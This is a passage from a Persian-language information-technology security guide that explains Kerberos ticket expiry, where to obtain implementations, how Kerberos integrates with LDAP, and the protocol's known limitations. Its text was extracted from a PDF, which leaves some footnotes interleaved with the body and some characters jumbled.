ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﺣﺴﺎﺱ ﻣﺜﻞ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﺍﻣﺎ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺑﻴﺸﺘﺮ ﺩﺍﺩﻩﻫﺎ ﻣﺜﻞ ﻓﺎﻳﻠﻬﺎ ﻭ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻪ.
ﺑﻠﻴﻂﻫﺎﻱ ﺻﺎﺩﺭﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ Kerberosﺑﻌﺪ ﺍﺯ ۸ﺳﺎﻋﺖ ﻣﻨﻘﻀﻲ ﻣﻲﺷﻮﻧﺪ -ﺍﻳﻦ ﺗﻜﻨﻴﻚ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤـﻼﺕ ﺗﻜـﺮﺍﺭ ﺩﺭﻧﻈـﺮ
ﮔﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺖ ١٧٧.ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻌﺪ ﺍﺯ ۸ﺳﺎﻋﺖ ﻣﺠﺪﺩﹰﺍ ﺑﺎﻳﺪ ﺑﺮﻧﺎﻣﺔ kinitﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻭ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻳﻜﺒـﺎﺭ ﺩﻳﮕـﺮ
ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﺗﺎ ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ Kerberosﺑﺮﺍﻳﺘﺎﻥ ﻳﻚ ﺑﻠﻴﻂ ﺟﺪﻳﺪ ﺻﺎﺩﺭ ﺷﻮﺩ.
ﺩﺭ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﺗﻚ ﻛﺎﺭﺑﺮﻱ Kerberos ،ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺩﺭ ﻛﻨﺎﺭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻌﻤﻮﻟﻲ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﮔﺮ ﺩﻭ ﻧﻔﺮ
ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺑﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻭﺍﺭﺩ ﺷﻮﻧﺪ ،ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻫﺮ ﺩﻭ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﭘـﺲ ﺍﻳـﻦ ﺩﻭ ﻛـﺎﺭﺑﺮ
ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺧﻮﺩ ﺭﺍ ﺑﺠﺎﻱ ﻳﻜﺪﻳﮕﺮ ﺟﺎ ﺑﺰﻧﻨﺪ .ﺍﻳﻦ ﺗﻬﺪﻳﺪ ﺩﺭ MITﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﻮﺩ ،ﻟـﺬﺍ ﺧـﺪﻣﺎﺕ ﻭﺭﻭﺩ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ
ﻛﺎﺭﻱ ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﺗﺎ ﻫﻨﮕﺎﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺍﺯ ﻭﺭﻭﺩ ﻣﻬﺎﺟﻤﻴﻦ ﺟﻠﻮﮔﻴﺮﻱ ﺷﻮﺩ .ﻫﻤﭽﻨﻴﻦ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ
ﻛﻪ ﻳﻜﻨﻔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺤﻠﻲ ﺭﺍ ﺗﺴﺨﻴﺮ ﻛﻨﺪ ﺗﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺭﺍ ﻫﻨﮕﺎﻡ ﺗﺎﻳﭗ ﺷﺪﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩ.
ﺗﻬﻴﺔ Kerberos
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻨﻲ Kerberosﻳﺎ ﻣﺸﺎﺑﻪ ﺁﻥ ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﻃﺮﻳﻖ ﭼﻨﺪﻳﻦ ﺷـﺮﻛﺖ ﺍﺭﺍﺋـﻪ ﻣـﻲﺷـﻮﻧﺪ ،ﻭ ﻫﻤﭽﻨـﻴﻦ ﻳـﻚ ﻗـﺴﻤﺖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻣﺜﻞ ،Mac OS X ،Solarisﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ Linuxﻭ BSDﺑﺸﻤﺎﺭ ﻣﻲﺁﻳﻨﺪ .ﺍﺯ Windows 2000ﺑﻪ
ﺑﻌﺪ ﺩﺭ Microsoft Windowsﻳﻚ ﻧﺴﺨﻪ ﺍﺯ Kerberos 5ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳـﺖ .ﻫﻤﭽﻨـﻴﻦ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣﻴـﺎﻥ
١٧٨
ﻣﺎﺷﻴﻨﻬﺎﻱ Unixﻭ ﺑﺴﺘﺮﻫﺎﻱ Windowsﺑﺘﻮﺍﻥ ﺍﺯ Kerberosﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﺍﮔﺮ ﺑﺎﻳﺪ Kerberosﺭﺍ ﺍﺯ ﺍﺑﺘﺪﺍ ﻧﺼﺐ ﻛﻨﻴﺪ ،ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ Kerberosﻣﺮﺑﻮﻁ ﺑﻪ MITﺑـﺮﺍﻱ ﺷـﻬﺮﻭﻧﺪﺍﻥ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻭ ﻛﺎﻧـﺎﺩﺍ ﺩﺭ
ﺁﺩﺭﺱ http://web.mit.edu/kerberos/www/ﻭ ﺑـــﺮﺍﻱ ﺩﻳﮕـــﺮﺍﻥ ﺩﺭ ﺁﺩﺭﺱ http://www.crypto-publish.orgﻗﺎﺑـــﻞ
۱۷۷ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﭘﻴﮑﺮﺑﻨﺪﻳﻬﺎ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﺣﺪﺍﻛﺜﺮ ﺯﻣﺎﻧﻲ ﺑﺮﺍﻱ ﻣﻌﺘﺒﺮ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻥ ﻛﻠﻴﺪ ﺗﻌﻴﻴﻦ ﻛﺮﺩ.
۱۷۸ﺩﺭ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺧﺘﺼﺎﺻﻲ ﺑﻪ ﭘﺮﻭﺗﻜﻞ kerberosﺩﺍﺩﻩ ﻛﻪ ﺍﺛﺮ ﺁﻥ ﻣﺠﺒﻮﺭ ﻛﺮﺩﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫـﺎﻱ Windowsﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
kerberosﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ Windowsﺍﺳﺖ .ﻟﺬﺍ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻣﺨﻠﻮﻁ Windowsﻭ ﻳﻮﻧﻴﻜﺲ ،ﺑﻬﺘﺮ ﺍﺳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ kerberosﻣﺎﺷـﻴﻨﻬﺎﻱ
Windows 2000ﺑﺎﺷﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﻫﻢ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ Windowsﻭ ﻫﻢ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ Unixﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣٤١
ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﺁﺩﺭﺳﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺭﺗﻘﺎﻫﺎﻱ ﺭﺳﻤﻲ ،ﺍﺻﻼﺣﻬﺎ ،ﻭ ﺍﻃﻼﻋﻴـﻪﻫـﺎﻱ ﺍﻋـﻼﻡ ﻧﻘـﺎﻳﺺ ﺭﺍ ﻧﻴـﺰ ﺑﻴﺎﺑﻴـﺪ .ﺩﺭ Kerberos
ﭼﻨﺪﻳﻦ ﺍﺷﻜﺎﻝ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺷﺖ؛ ﻟﺬﺍ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ
ﺭﺍﻳﮕﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ Kerberosﺑﻪ ﻧﺎﻡ " "Heimdalﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺼﻮﺭﺕ ﭘﻮﻳﺎ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻭ ﺑـﺎ Kerberosﻣﺮﺑـﻮﻁ ﺑـﻪ MIT
ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺳﺎﺯﮔﺎﺭ ﺍﺳﺖ .ﻣﻲﺗﻮﺍﻧﻴـﺪ Heimdalﺭﺍ ﺍﺯ ﺁﺩﺭﺱ http://www.pdc.kth.se/heimdal/ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ .ﺗﻐﻴﻴـﺮﺍﺕ ﻻﺯﻡ ﺩﺭ
ﭘﻴﮑﺮﺑﻨﺪﻱ ﺑﺮﺍﻱ ﺳﺎﺯﮔﺎﺭﻱ Kerberosﺑﺎ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ؛ ﺍﮔﺮ ﺧﻮﺩﺗﺎﻥ ﺑﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻋﻤـﺎﻝ ﻛﻨﻴـﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﺮﺍﻱ
ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺍﺳﻨﺎﺩ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺩﺭ ﺧﻮﺩ Kerberosﺭﺟﻮﻉ ﻧﻤﺎﻳﻴﺪ.
Kerberosﻭ LDAP
Kerberosﺑﺎ ) LDAPﻛﻪ ﺩﺭ ﻗﺴﻤﺖ ﺑﻌﺪﻱ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ( ﺑﺨﻮﺑﻲ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﺮﻛﻴﺐ ﻣﻲﺷﻮﻧﺪ Kerberos .ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﻭ ﺍﻳﻤﻦ ﻛﺮﺩﻥ queryﻫﺎ ﻭ ﺍﺭﺗﻘﺎﻫﺎﻱ LDAPﺑﻜﺎﺭ ﺭﻭﺩ .ﺩﺭ ﻣﻘﺎﺑﻞ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ LDAPﻫـﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮﺍﻥ ﻛـﻪ
ﭼﮕﺎﻟﺘﺮ ﺍﺯ ﺩﺍﺩﺓ ﺣﻔﺎﻇﺖﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺗﻨﻬﺎ Kerberosﺍﺳﺖ -ﻣﺜﻞ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ ﺧﺎﻧﻪ ﻛﺎﺭﺑﺮ ،ﭘﻮﺳﺘﻪ ،ﺷـﻤﺎﺭﻩ ﺗﻠﻔـﻦ ،ﻳـﺎ ﺩﻳﮕـﺮ ﺍﻃﻼﻋـﺎﺕ
ﺳﺎﺯﻣﺎﻧﻲ -ﺭﺍ ﺫﺧﻴﺮﻩ ﻛﻨﺪ .ﺩﺭ ﻣﺠﻤﻮﻉ ،ﺍﻳﻦ ﺩﻭ ﺳﺮﻭﻳﺲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﻤﺔ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ NISﻭ NIS+ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﻫـﻢ
١٧٩
ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ LDAPﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻥ ﻛﻠﻴﺪﻫﺎﻱ Kerberosﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ .ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ Windowsﺍﺯ Kerberosﺍﺯ ﺧـﺪﻣﺎﺕ
) Microsoft Active Directoryﻳﻚ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﺯ (LDAPﺑـﺮﺍﻱ ﺫﺧﻴـﺮﺓ ﻛﻠﻴـﺪﻫﺎﻱ Kerberosﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪHeimdal .
Kerberosﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺭﺍ ﭘﺸﺘﻴﺎﺑﻲ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ MIT Kerberosﻧﻪ؛ ﻭ ﺍﻟﺒﺘﻪ ﺟﺎﻱ ﻧﮕﺮﺍﻧﻲ ﻧﻴﺴﺖ ،ﭼﺮﺍﻛﻪ ﺩﺭ MIT Kerberosﺍﻳﻦ
ﻛﻠﻴﺪﻫﺎ ﺩﺭ ﺧﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ Kerberosﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ.
ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ Kerberos
ﺍﮔﺮﭼﻪ Kerberosﻳﻚ ﺭﺍﻩ ﺣﻞ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﻳﻚ ﻣﺸﻜﻞ ﺍﺳﺎﺳﻲ ﺍﺳﺖ ﺍﻣﺎ ﻫﻨﻮﺯ ﻫﻢ ﻧﻘﺎﻳﺺ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﮐـﻪ ﺩﺭ ﺫﻳـﻼ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺷـﺎﺭﻩ
ﻣﻲﺷﻮﺩ:
ﻫﺮ ﺳﺮﻭﻳﺲ ﺷﺒﻜﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﺧﺘﺼﺎﺻﻲ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ Kerberosﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﺩ
Kerberosﺩﺭ ﻣﺤﻴﻂ ﺍﺷﺘﺮﺍﻙ ﺯﻣﺎﻧﻲ ﺧﻮﺏ ﻛﺎﺭ ﻧﻤﻲﻛﻨﺪ
Kerberosﺑﺮﺍﻱ ﻣﺤﻴﻄﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻛﻪ ﺩﺭ ﻫﺮ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺁﻥ ﻳﻚ ﻛﺎﺭﺑﺮﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﮔﺮ ﻳﻚ ﻛﺎﺭﺑﺮ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﭼﻨـﺪ ﻧﻔـﺮ
ﺩﻳﮕﺮ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻠﻴﻂ ﻛﺎﺭﺑﺮ ﺗﻮﺳـﻂ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺑـﻪ ﺳـﺮﻗﺖ ﺑـﺮﻭﺩ .ﺩﺭ ﺁﻧـﺼﻮﺭﺕ ﺑﻠﻴﻄﻬـﺎﻱ
ﺩﺯﺩﻳﺪﻩﺷﺪﻩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻓﺮﻳﺒﻨﺪﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ.
Kerberosﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻳﻤﻦ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ Kerberosﻧﻴﺎﺯ ﺩﺍﺭﺩ
ﺑﺪﻟﻴﻞ ﻧﻮﻉ ﻃﺮﺍﺣﻲ Kerberos ،ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻳﻤﻦ ﻣﺮﻛﺰﻱ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻛﻪ ﺣﺎﻭﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺍﺻـﻠﻲ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻭ ﺑﻄـﻮﺭ
ﻣﺪﺍﻭﻡ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﻗﻴﻘـﹰﺎ ﺑﺎﻳـﺪ ﺍﺯ ﻫـﻴﭻ ﭼﻴـﺰﻱ ﻏﻴـﺮ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ Kerberos
۱۷۹ﺟﻴﺴﻦ ﻫﻴﺲ ) (Jason Heissﺭﺍﻫﻨﻤﺎﻱ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺩﺭ ﺻﻔﺤﻪﺍﻱ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺧـﻮﺩ ﺑﻨـﺎﻡ "ﺟـﺎﻳﮕﺰﻳﻨﻲ NISﺑـﺎ Kerberosﻭ "LADPﺩﺭ ﺁﺩﺭﺱ
http://www.ofb.net/~jheiss/krbldapﺍﺭﺍﺋﻪ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﻌﻠﺖ ﻃﺮﺍﺣﻲ ،Kerberosﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺍﺯ Kerberosﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﺑﺎﻳﺪ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﺩ .ﺭﻭﻧﺪ ﺍﻋﻤﺎﻝ ﺍﻳﻦ ﺗﻐﻴﻴـﺮﺍﺕ ﺭﻭﻱ
ﻻ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻳﺪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ ،ﻭ ﻳﺎ ﺑﺮﻧﺎﻣـﻪ
ﻻ " "Kerberizingﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ .ﻣﻌﻤﻮ ﹰ
ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻌﻤﻮ ﹰ
ﺍﺯ ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻛﻪ ﺍﺯ ﻗﺒﻞ ﺑﺎ Kerberosﺍﺩﻏﺎﻡ ﺷﺪﻩ )ﻣﺜﻞ PAMﻛﻪ ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﺍﻳﻦ ﻓﺼﻞ ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﺑﺤﺚ ﺧﻮﺍﻫﺪ ﺷﺪ(.
٣٤٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺗﺤﺖ ﻗﻔﻞ ﻭ ﻛﻠﻴﺪ ﻭ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻛﻪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﺍﻣﻦ ﺍﺳﺖ ﻧﮕﻬـﺪﺍﺭﻱ
ﺷﻮﺩ .ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺧﺮﺍﺏ ﺷﻮﺩ ،ﺗﻤﺎﻡ ﺷﺒﻜﺔ Kerberosﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﮔﺮﺩﺩ.
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺍﺻﻠﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ -ﻛﻪ ﺭﻭﻱ ﻫﻤـﺎﻥ ﺩﻳـﺴﻚ
ﺳﺨﺘﻲ ﻭﺍﻗﻊ ﺷﺪﻩ ﻛﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﺷﺪﻩ ﺩﺭ ﺁﻥ ﻫﺴﺘﻨﺪ -ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
Kerberosﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ،ﻫﻤﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺗﻐﻴﻴﺮ ﻳﺎﺑﻨﺪ.
Kerberosﺗﻐﻴﻴﺮﺍﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺳﻴﺴﺘﻤﻲ )ﺍﺳﺒﻬﺎﻱ ﺗﺮﻭﺍ( ﺭﺍ ﻧﺎﺩﻳﺪﻩ ﻣﻲﮔﻴﺮﺩ
Kerberosﺑﺎﻋﺚ ﻧﻤﻲﺷﻮﺩ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﺤﻠﻲ ،ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ -ﻳﻌﻨﻲ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﻱ ﻛـﻪ ﭘـﺸﺖ ﺭﺍﻳﺎﻧـﻪ
ﻧﺸﺴﺘﻪ ﻫﻴﭻ ﺭﺍﻫﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻔﻬﻤﺪ ﺭﺍﻳﺎﻧﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﻳﺎ ﻧﻪ .ﺍﻳﻦ ﻛﻤﺒﻮﺩ ﺑﺮﺍﺣﺘﻲ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﺁﮔﺎﻩ ﺑﻪ ﺍﻳﻦ
ﻣﺴﺌﻠﻪ ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﭘﻴﺎﻣﺪﻫﺎﻱ ﺍﻳﻦ ﺣﻘﻴﻘﺖ ﻫﺴﺘﻨﺪ ﻛﻪ ﺣﺘﻲ ﺩﺭ ﻳﻚ ﺷﺒﻜﻪ ،ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ
ﻛﺎﺭﻱ ﺩﺍﺭﺍﻱ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ ﻫﺴﺘﻨﺪ.
Kerberosﻣﻤﻜﻦ ﺍﺳﺖ ﻋﺪﻡ ﺍﻋﺘﻤﺎﺩ ﮔﺴﺘﺮﺵﻳﺎﺑﻨﺪﻩ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ
ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻳﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﺍﻓﺸﺎ ﺷﻮﺩ ،ﺑﺮﺍﻱ ﻳﻚ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻛﻨﻨﺪﻩ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺍﺯ ﺁﻥ ﺭﻣـﺰ ﻋﺒـﻮﺭ
